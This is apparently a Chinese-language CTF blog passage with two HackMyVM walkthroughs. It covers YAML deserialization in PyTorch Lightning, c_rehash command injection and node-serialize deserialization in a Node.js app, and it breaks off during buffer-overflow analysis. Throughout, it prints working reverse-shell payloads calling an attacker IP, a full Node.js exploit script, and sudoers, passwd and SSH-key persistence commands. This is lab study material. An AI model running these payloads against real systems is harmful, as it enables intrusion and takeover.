|   3072 3a:9a:6c:98:00:a7:c8:66:94:fe:58:7e:61:a7:f9:e8 (RSA)
|   256 9d:6f:0d:13:02:3c:65:45:79:1b:3d:9b:e2:5e:24:5f (ECDSA)
|_  256 82:ba:54:82:f7:1d:a2:65:fc:9f:25:dc:43:ee:7e:4c (ED25519)
80/tcp   open  http    Apache httpd 2.4.54 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.54 (Debian)
9090/tcp open  http    Apache httpd 2.4.54 ((Debian))
|_http-server-header: Apache/2.4.54 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.71 seconds

80端口

目录扫描

简单扫了下没啥东西，估计突破点在9090端口

9090端口

可以写入后缀为.yaml的文件然后在页面端进行文件名读取

没啥思路，查看源码

<!DOCTYPE HTML>
<html>
<body style="background-color: rgb(225,225,225)">
<h1>Nuclei War Now!</h1>
    <form name="savefile" method="post" action="">
        File Name: <input type="text" name="filename" value="">.yaml<br/>
        <textarea rows="10" cols="100" name="textdata"></textarea><br/>
        <input type="submit" name="submitsave" value="Save template on the server">
</form>
    <br/><hr style="background-color: rgb(150,150,150); color: rgb(150,150,150); width: 100%; height: 4px;"><br/>
    <form name="openfile" method="post" action="">
        Open File: <input type="text" name="filename" value="">.yaml
        <input type="submit" name="submitopen" value="View content">
</form>
    <br/><hr style="background-color: rgb(150,150,150); color: rgb(150,150,150); width: 100%; height: 4px;"><br/>
    File contents:<br/>
    <!--Backend developed with PyTorch Lightning 1.5.9-->
</body>
</html>

PyTorch Lightning 1.5.9漏洞

没找到

通过看wp得知了该框架下的一个漏洞

CVE-2021-4118

huntr - The world’s first bug bounty platform for AI/ML

PyTorch Lightning 的 core.saving.load_hparams_from_yaml 使用了 **yaml.UnsafeLoader**。
通过恶意构造的 YAML 文件，可以在加载时执行任意 Python 代码。
本质上是 远程代码执行（RCE）风险，只要加载恶意 YAML 文件即可。

利用gobuster扫描该页面

┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://192.168.0.107:9090 -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,html,zip,db,bak,js,yaml -t 64  
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.107:9090
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              js,yaml,php,txt,html,zip,db,bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 280]
/.php                 (Status: 403) [Size: 280]
/index.php            (Status: 200) [Size: 910]
/test.yaml            (Status: 200) [Size: 19]
/manual               (Status: 301) [Size: 322] [--> http://192.168.0.107:9090/manual/]
/file.yaml            (Status: 200) [Size: 0]
/javascript           (Status: 301) [Size: 326] [--> http://192.168.0.107:9090/javascript/]

找到了file.yaml

为了获得反向 shell，基于漏洞的“概念验证”，我在终端上运行监听器并创建以下 yaml：

- !!python/object/new:yaml.MappingNode
  listitems: !!str '!!python/object/apply:subprocess.Popen [["nc","-e", "/bin/bash", "192.168.0.106", "1234"]]'
  state:
    tag: !!str dummy
    value: !!str dummy
    extend: !!python/name:yaml.unsafe_load

id: !!python/object/apply:subprocess.Popen [["nc", "192.168.0.106", "4444", "-c", "sh"]]

当我用名为“file”的名上传到服务器时（服务器会自动添加扩展名），我会看到类似 www-data 的 shell。

我一直以为没有弹回来，结果是没有弹出tty命令行

python3 -c 'import pty; pty.spawn("/bin/bash")'

提权-wicca

www-data@cve-pt1:~$ sudo -l
sudo -l
sudo: unable to resolve host cve-pt1: No address associated with hostname

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for www-data: 

www-data@cve-pt1:~$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/su
/usr/bin/passwd
/usr/bin/mount
/usr/bin/gpasswd
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

www-data@cve-pt1:~$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
avahi-autoipd:x:105:114:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
wicca:x:1000:1000:wicca,,,:/home/wicca:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin

www-data@cve-pt1:/etc/cron.d$ ls -al
ls -al
total 28
drwxr-xr-x  2 root root 4096 Dec  7  2022 .
drwxr-xr-x 77 root root 4096 Jan 11 23:40 ..
-rw-r--r--  1 root root  285 Feb  6  2021 anacron
-rw-r--r--  1 root root  418 Dec  7  2022 cve1
-rw-r--r--  1 root root  201 Jun  7  2021 e2scrub_all
-rw-r--r--  1 root root  712 May 11  2020 php
-rw-r--r--  1 root root  102 Feb 22  2021 .placeholder

www-data@cve-pt1:/etc/cron.d$ cat cve1
cat cve1
*/1 * * * * www-data python3 /var/www/cve/2021-4118.py
*/1 * * * * www-data sleep 20; python3 /var/www/cve/2021-4118.py
*/1 * * * * www-data sleep 40; python3 /var/www/cve/2021-4118.py
*/1 * * * * wicca c_rehash /etc/ssl/certs/
*/1 * * * * wicca sleep 30; c_rehash /etc/ssl/certs/
*/1 * * * * root python3 /root/0845.py
*/1 * * * * root sleep 20; python3 /root/0845.py
*/1 * * * * root sleep 40; python3 /root/0845.py

在查找计划任务时发现有一个叫 Wicca 的用户

c_rehash 命令有一个漏洞 CVE-2022-1292，[https://github.com/alcaparra/CVE-2022-1292/blob/main/README.md]

www-data@cve-pt1:~$ ls -la /usr/bin/c_rehash
ls -la /usr/bin/c_rehash
-rwxr-xr-x 1 root root 6176 Dec  6  2022 /usr/bin/c_rehash

访问 /etc/ssl/certs/（默认）或 update-ca-certificates 中配置的其他路径
www-data@cve-pt1:/etc/cron.d$ cd /etc/ssl/certs/
cd /etc/ssl/certs/

echo "-----BEGIN CERTIFICATE-----" > "hey.crt\`nc -c sh 192.168.0.106 12345\`" （NC 作为有效载荷示例）

等一分钟

┌──(kali㉿kali)-[~]
└─$ nc -lvvp 12345
listening on [any] 12345 ...
192.168.0.107: inverse host lookup failed: Unknown host
connect to [192.168.0.106] from (UNKNOWN) [192.168.0.107] 59288
id
uid=1000(wicca) gid=1000(wicca) groups=1000(wicca)

HMVM{e49553320c33fa8866cddae2954ee228}

提权-root

wicca@cve-pt1:~$ sudo -l
sudo -l
sudo: unable to resolve host cve-pt1: No address associated with hostname
Matching Defaults entries for wicca on cve-pt1:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User wicca may run the following commands on cve-pt1:
    (root) NOPASSWD: /usr/bin/tee

(wicca) NOPASSWD: /usr/bin/tee

👉 tee 以 root 身份运行

👉 可以向任意 root 可写文件写内容

👉 = 直接 root

🚀 方法一（最推荐）：写 `/etc/sudoers` → 永久 root

给 wicca 直接加 sudo ALL 权限。

1️⃣ 执行（一次就够）

echo "wicca ALL=(ALL) NOPASSWD: ALL" | sudo tee -a /etc/sudoers

2️⃣ 验证

sudo -l

3️⃣ 直接 root

sudo -i

✅ 这是最稳定、最干净的提权方式

🚀 方法二：写 root 的 SSH key（免密 root 登录）

如果你想 长期稳定控制 这台机子。

1️⃣ 本地生成 key（Kali）

ssh-keygen -t rsa

2️⃣ 把公钥写进 root

cat ~/.ssh/id_rsa.pub | sudo tee -a /root/.ssh/authorized_keys

3️⃣ 直接 root 登录

ssh root@cve-pt1

🚀 方法三：覆盖关键文件（一次性 root shell）

方式 A：覆盖 `/etc/passwd`（不太推荐但能用）

echo 'root2::0:0:root:/root:/bin/bash' | sudo tee -a /etc/passwd
su root2

⚠️ 改 passwd 文件在实战里不优雅，但 CTF 可用。

root@cve-pt1:~# cat root.txt
cat root.txt
HMVM{01cefdb2ed88aa502ec4149bb19ebae6}

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hmvmachines/cve1/

HMV-Deba

呼啸山庄 — Mon, 12 Jan 2026 00:00:00 GMT

信息收集

IP定位

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l | grep "08:00:27"
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
192.168.0.102   08:00:27:57:b1:d0       (Unknown)

Nmap扫描

┌──(root㉿kali)-[/home/kali]
└─# nmap -Pn -sTCV -T4 -p0-65535 192.168.0.102        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-12 06:22 EST
Nmap scan report for 192.168.0.102
Host is up (0.00037s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 22:e4:1e:f3:f6:82:7b:26:da:13:2f:01:f9:d5:0d:5b (RSA)
|   256 7b:09:3e:d4:a7:2d:92:01:9d:7d:7f:32:c1:fd:93:5b (ECDSA)
|_  256 56:fd:3d:c2:19:fe:22:24:ca:2c:f8:07:90:1d:76:87 (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.60 seconds

目录扫描

┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u http://192.168.0.102     

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js
HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.0.102/_26-01-12_06-26-06.txt

Target: http://192.168.0.102/

[06:26:06] Starting: 

[06:26:26] 301 -  321B  - /node_modules  ->  http://192.168.0.102/node_modules/
[06:26:26] 200 -  992B  - /node_modules/
[06:26:27] 200 -   32KB - /package-lock.json
[06:26:27] 200 -  116B  - /package.json
[06:26:31] 403 -  278B  - /server-status
[06:26:31] 403 -  278B  - /server-status/
[06:26:31] 200 -  386B  - /server.js

Task Completed

┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://192.168.0.102 -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,html,zip,db,bak,js,yaml -t 64 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.102
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              js,yaml,php,txt,html,zip,db,bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 10701]
/.html                (Status: 403) [Size: 278]
/server.js            (Status: 200) [Size: 679]
/.html                (Status: 403) [Size: 278]
/server-status        (Status: 403) [Size: 278]
Progress: 1985031 / 1985040 (100.00%)
===============================================================
Finished
===============================================================

/server.js

// 引入 express 框架，用于创建 Web 服务器
var express = require('express');

// 引入 cookie-parser，用于解析 HTTP 请求中的 Cookie
var cookieParser = require('cookie-parser');

// 引入 escape-html，用于对 HTML 特殊字符进行转义，防止 XSS
var escape = require('escape-html');

// 引入 node-serialize，用于对象的序列化与反序列化（⚠️存在安全风险）
var serialize = require('node-serialize');

// 创建一个 Express 应用实例
var app = express();

// 将 cookie-parser 作为中间件使用
// 这样 req.cookies 才能读取到客户端发送的 cookie
app.use(cookieParser())

// 定义 GET 请求，访问根路径 /
app.get('/', function(req, res) {

    // 判断客户端是否携带名为 profile 的 cookie
    if (req.cookies.profile) {

        // 将 cookie 中的 base64 字符串解码成普通字符串
        // ⚠️ Buffer 构造方式已被废弃，推荐使用 Buffer.from
        var str = new Buffer(req.cookies.profile,'base64').toString();

        // 使用 node-serialize 反序列化字符串为对象
        // ⚠️ 非常危险：如果 cookie 被用户篡改，可能触发代码执行
        var obj = serialize.unserialize(str);

        // 如果反序列化后的对象中存在 username 字段
        if (obj.username) {

            // 对 username 进行 HTML 转义，防止 XSS
            // 然后返回 “Hello 用户名”
            res.send("Hello " + escape(obj.username));
        }

    } else {

        // 如果客户端没有 profile cookie
        // 设置一个默认的 profile cookie（base64 编码的 JSON）
        res.cookie(
            'profile',
            "eyJ1c2VybmFtZSI6ImFqaW4iLCJjb3VudHJ5IjoiaW5kaWEiLCJjaXR5IjoiYmFuZ2Fsb3JlIn0=",
            {
                maxAge: 900000, // cookie 有效期 15 分钟（毫秒）
                httpOnly: true  // 只能通过 HTTP 访问，JS 无法读取
            }
        );
    }

    // 无论上面逻辑是否执行，最终都会执行这一句
    // ⚠️ 问题：如果前面已经 res.send 过，会导致逻辑混乱
    res.send("Hello World");
});

// 启动服务器，监听 3000 端口
app.listen(3000);

**使用 ****cookie-parser** 解析请求中的 cookie。
**使用 ****node-serialize** 来序列化和反序列化对象。
**访问根路径 ****/**：
如果请求中有 profile cookie：
1. 将 cookie 的 base64 内容解码成字符串。
2. 使用 serialize.unserialize 将字符串转换成对象。
3. 如果对象里有 username，用 escape 过滤后返回 "Hello username"。
如果没有 profile cookie：
1. 服务器设置一个默认的 profile cookie（内容是 base64 编码的 JSON）。
默认返回 "Hello World"。

eyJ1c2VybmFtZSI6ImFqaW4iLCJjb3VudHJ5IjoiaW5kaWEiLCJjaXR5IjoiYmFuZ2Fsb3JlIn0=

base64解码后为

{"username":"ajin","country":"india","city":"bangalore"}

漏洞理解

{
  "username": "_$$ND_FUNC$$_function(){
    require('child_process').exec('whoami',function() {})
  }()"
}

核心

是 node-serialize 库的 unserialize 函数。该函数在反序列化时，如果遇到特殊的函数标记（_$$ND_FUNC$$_），会执行该函数。攻击者可以构造一个特殊的序列化字符串，其中包含恶意代码，当服务器调用 unserialize 时就会执行这些代码。

关键点

_$$ND_FUNC$$_

这是 node-serialize 的特殊标记，意思是：

"嘿！我不是普通的字符串，我是一段要执行的函数代码！"

当 node-serialize 看到这个标记，它会：

提取后面的字符串：function(){require('child_process').exec('whoami',...
用 eval() 或 new Function() 把它变成真正的函数
立即执行这个函数（因为有 () 在最后）

// 反序列化（漏洞在这里！）
对象 = serialize.unserialize(解码后的);
// node-serialize看到_$$ND_FUNC$$_，会执行后面的函数代码
// 结果：黑客的代码在服务器上运行了！

漏洞利用

反弹shell

// reverse_shell_exploit.js
const http = require('http');
const net = require('net');

// 配置
const config = {
    target: '192.168.0.102:3000',
    attacker: '192.168.0.106',
    shellPort: 4444
};

// 创建恶意 cookie
function createReverseShellCookie() {
    // 使用 Node.js 创建反向连接
    const reverseCode = `
        var net = require('net');
        var cp = require('child_process');
        var sh = cp.spawn('/bin/sh', []);
        var client = new net.Socket();
        client.connect(${config.shellPort}, '${config.attacker}', function() {
            client.pipe(sh.stdin);
            sh.stdout.pipe(client);
            sh.stderr.pipe(client);
        });
    `;
    
    const payload = {
        username: `_$$ND_FUNC$$_function(){${reverseCode}}()`
    };
    
    return Buffer.from(JSON.stringify(payload)).toString('base64');
}

// 启动监听
function startListener(port) {
    console.log(`[+] 启动监听器在端口 ${port}...`);
    
    const server = net.createServer((socket) => {
        console.log('[+] 收到反向连接!');
        console.log('[+] 远程地址:', socket.remoteAddress);
        
        // 交互式 shell
        process.stdin.pipe(socket);
        socket.pipe(process.stdout);
        
        socket.on('close', () => {
            console.log('[!] 连接关闭');
            process.exit();
        });
    });
    
    server.listen(port, () => {
        console.log(`[+] 监听器在 ${config.attacker}:${port} 启动成功`);
        
        // 发送攻击请求
        setTimeout(() => sendExploit(), 1000);
    });
}

// 发送攻击请求
function sendExploit() {
    const cookieValue = createReverseShellCookie();
    console.log('[+] 发送恶意请求...');
    
    const options = {
        hostname: '192.168.0.102',
        port: 3000,
        path: '/',
        method: 'GET',
        headers: {
            'Cookie': `profile=${cookieValue}`
        }
    };
    
    const req = http.request(options, (res) => {
        console.log(`[+] 服务器响应状态: ${res.statusCode}`);
        res.on('data', () => {}); // 忽略响应数据
    });
    
    req.on('error', (e) => {
        console.log('[!] 请求失败:', e.message);
    });
    
    req.end();
}

// 主函数
console.log(`
====================================
    Node.js 反序列化反向 Shell
====================================
目标: ${config.target}
攻击机: ${config.attacker}
监听端口: ${config.shellPort}
====================================
`);

startListener(config.shellPort);

{"username":"_$$ND_FUNC$$_function(){\n var net = require('net');\n var cp = require('child_process');\n var sh = cp.spawn('/bin/sh', []);\n var client = new net.Socket();\n client.connect(4444, '192.168.0.106', function() {\n client.pipe(sh.stdin);\n sh.stdout.pipe(client);\n sh.stderr.pipe(client);\n });\n }()"}

npm install node-serialize axios
node exploit_deserialize.js

┌──(root㉿kali)-[/home/kali/Desktop/hmv]
└─# node shell.js                   

====================================
    Node.js 反序列化反向 Shell
====================================
目标: 192.168.0.102:3000
攻击机: 192.168.0.106
监听端口: 4444
====================================

[+] 启动监听器在端口 4444...
[+] 监听器在 192.168.0.106:4444 启动成功
[+] 发送恶意请求...
[+] 服务器响应状态: 200
[+] 收到反向连接!
[+] 远程地址: ::ffff:192.168.0.102
whoami
www-data

升级tty

python3 -c 'import pty; pty.spawn("/bin/bash")'

www-data@debian:/home/low$ cat user.txt
cat user.txt
justdeserialize

python库劫持提权-low

www-data@debian:/home/low$ sudo -l
sudo -l
Matching Defaults entries for www-data on debian:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on debian:
    (ALL : low) NOPASSWD: /usr/bin/python3 /home/low/scripts/script.py

www-data 用户可以以 low 用户身份运行指定脚本
不需要密码 (NOPASSWD)
可以运行：/usr/bin/python3 /home/low/scripts/script.py

www-data@debian:/home/low$ cat /home/low/scripts/script.py
cat /home/low/scripts/script.py
import main
import os

print("\n")
os.system("ip a | grep enp0s3")

print("\n")

用 `cat >` 覆盖 `main.py` 内容

www-data@debian:/home/low$ 
cat > /home/low/scripts/main.py << 'EOF'
import os
os.system('bash')
EOF

使用 shell 的重定向 > 直接覆盖 main.py 的内容。
新内容是一个恶意 Python 脚本：
- 打印提示
- 执行 id 和 whoami 查看当前身份
- 启动一个 bash shell（获得交互式控制）

✅ 成功注入恶意代码到 main.py。

触发目标脚本执行（以 `low` 身份）

www-data@debian:/home/low$ sudo -u low /usr/bin/python3 /home/low/scripts/script.py

系统以 low 用户身份运行 script.py
假设 script.py 内容类似：

# script.py
import main  # 从当前目录导入 main.py
main.run()

由于 Python 默认优先从当前工作目录导入模块，因此会加载被篡改的 main.py

计时任务提权-debain

low@debian:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/sbin/pppd
/usr/bin/bwrap
/usr/bin/umount
/usr/bin/fusermount
/usr/bin/su
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/ntfs-3g
/usr/bin/chsh
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/xorg/Xorg.wrap
low@debian:/$ cat /etc/cron*
cat /etc/cron*
cat: /etc/cron.d: Es un directorio
cat: /etc/cron.daily: Es un directorio
cat: /etc/cron.hourly: Es un directorio
cat: /etc/cron.monthly: Es un directorio
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/1 *   * * *   debian /usr/bin/python3 /home/debian/Documentos/backup/dissapeared.py ; echo "Done" >> /home/debian/Documentos/log 
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
cat: /etc/cron.weekly: Es un directorio

low@debian:/home/debian/Documentos$ ls -al
ls -al
total 12
drwxrwx---  2 debian low    4096 may  7  2021 .
drwxr-xr-x 15 debian debian 4096 may  8  2021 ..
-rw-r--r--  1 debian debian  460 ene 12 13:36 log

发现该目录咱们这个low用户可写，尝试写一个backup/dissapeared.py进去：

low@debian:/home/debian/Documentos$ mkdir backup
low@debian:/home/debian/Documentos$ chmod 777 backup
low@debian:/home/debian/Documentos$ cd backup/
low@debian:/home/debian/Documentos/backup$ echo "import os;os.system('nc -e /bin/bash 192.168.0.106 1234')" > dissapeared.py
low@debian:/home/debian/Documentos/backup$ chmod +x dissapeared.py

┌──(root㉿kali)-[/home/kali]
└─# nc -lvvp 1234
listening on [any] 1234 ...
192.168.0.102: inverse host lookup failed: Unknown host
connect to [192.168.0.106] from (UNKNOWN) [192.168.0.102] 47150
id
uid=1000(debian) gid=1000(debian) grupos=1000(debian),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),114(lpadmin),115(scanner)

提权-root

升级tty

python3 -c 'import pty; pty.spawn("/bin/bash")'

sudo -l

debian@debian:/$ sudo -l
sudo -l
Matching Defaults entries for debian on debian:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User debian may run the following commands on debian:
    (ALL : root) NOPASSWD: /bin/wine
        /opt/Buffer-Overflow-Vulnerable-app/brainfuck.exe

允许普通用户以 root 身份运行 Wine 来执行一个“存在缓冲区溢出漏洞”的程序

① brainfuck.exe 是什么？

Windows 程序
明确标注 Buffer Overflow Vulnerable
说明存在 内存破坏类漏洞

② wine 在 sudo 下是 root

wine 进程 = root
wine 加载的 exe = root 权限上下文

③ 缓冲区溢出意味着什么？

覆盖返回地址 / 函数指针
控制程序执行流
执行任意代码

④ 任意代码在谁的权限下执行？

👉 root

brainfuck.exe

debian@debian:/$ file /opt/Buffer-Overflow-Vulnerable-app/brainfuck.exe
file /opt/Buffer-Overflow-Vulnerable-app/brainfuck.exe
/opt/Buffer-Overflow-Vulnerable-app/brainfuck.exe: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows

debian@debian:/opt/Buffer-Overflow-Vulnerable-app$ ls -al
ls -al
total 9240
drwxr-xr-x  6 debian debian    4096 may  7  2021 .
drwxr-xr-x  3 root   root      4096 may  7  2021 ..
-rw-r--r--  1 debian debian   21190 may  7  2021 brainfuck.exe
-rw-r--r--  1 debian debian   21190 may  7  2021 brainpan.exe
-rw-r--r--  1 debian debian   13312 may  7  2021 dostackbufferoverflowgood.exe
drwxr-xr-x  8 debian debian    4096 may  7  2021 .git
drwxr-xr-x 54 debian debian    4096 may  7  2021 node_modules
-rw-r--r--  1 debian debian      60 may  7  2021 NOTE.txt
drwxr-xr-x  2 debian debian    4096 may  7  2021 oscp
-rw-r--r--  1 debian debian   14740 may  7  2021 package-lock.json
-rw-r--r--  1 debian debian     277 may  7  2021 README.md
-rw-r--r--  1 debian debian 9266237 may  7  2021 SLMail.exe
-rw-r--r--  1 debian debian   76152 may  7  2021 vcruntime140.dll
drwxr-xr-x  2 debian debian    4096 may  7  2021 vulnserver

pwn环境搭建

python3 -m venv pwn  
source ./pwn/bin/activate 
┌──(pwn)─(root㉿kali)-[/home/kali/Desktop/tools/pwndbg]
└─# python3 -m pip install --upgrade pwntools -i https://pypi.doubanio.com/simple

git clone https://github.com/pwndbg/pwndbg
cd pwndbg
./setup.sh

┌──(pwn)─(root㉿kali)-[/home/kali/Desktop/tools/pwndbg]
└─# gdb                                                                          
GNU gdb (Debian 17.1-1) 17.1
Copyright (C) 2025 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word".
pwndbg: loaded 212 pwndbg commands. Type pwndbg [filter] for a list.
pwndbg: created 13 GDB functions (can be used with print/break). Type help function to see them.
------- tip of the day (disable with set show-tips off) -------
Want to NOP some instructions? Use patch <address> 'nop; nop; nop'
pwndbg> 

┌──(pwn)─(root㉿kali)-[/home/kali/Desktop/tools/pwndbg]
└─# sudo apt install ghidra -y

栈溢出漏洞

sudo -u root /bin/wine /opt/Buffer-Overflow-Vulnerable-app/brainfuck.exe
[+] initializing winsock...done.
[+] server socket created.
[+] bind done on port 9999
[+] waiting for connections.

┌──(root㉿kali)-[/home/kali/Desktop/hmv]
└─# nc 192.168.0.102 9999
_|                            _|                                        
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|  
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                          
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                              

                          >>

┌──(pwn)─(root㉿kali)-[/home/kali/Desktop/tools/pwndbg]
└─# ghidra

//将项目拖入进行反编译

/* WARNING: Removing unreachable block (ram,0x311716c5) */

int __cdecl _main(int _Argc,char **_Argv,char **_Env)

{
  int iVar1;
  size_t in_stack_fffff9f0;
  sockaddr local_5dc;
  sockaddr local_5cc;
  SOCKET local_5b4;
  SOCKET local_5b0;
  WSADATA local_5ac;
  int local_414;
  int local_410;
  int local_40c;
  char *local_408;
  char *local_404;
  char *local_400;
  char local_3fc [1016];
  
  __alloca(in_stack_fffff9f0);
  ___main();
  local_400 = 
  "_|                            _|                                        \n_|_|_|    _|  _|_|    _ |_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|  \n_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|\n_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _ |\n_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|\n                                            _|                          \n                                            _ |\n\n[________________________ WELCOME TO BRAINPAN _________________________]\n                          ENTER THE PASSWORD                              \n\n                          >> "
  ;
  local_404 = "                          ACCESS DENIED\n";
  local_408 = "                          ACCESS GRANTED\n";
  local_410 = 9999;
  local_414 = 1;
  printf("[+] initializing winsock...");
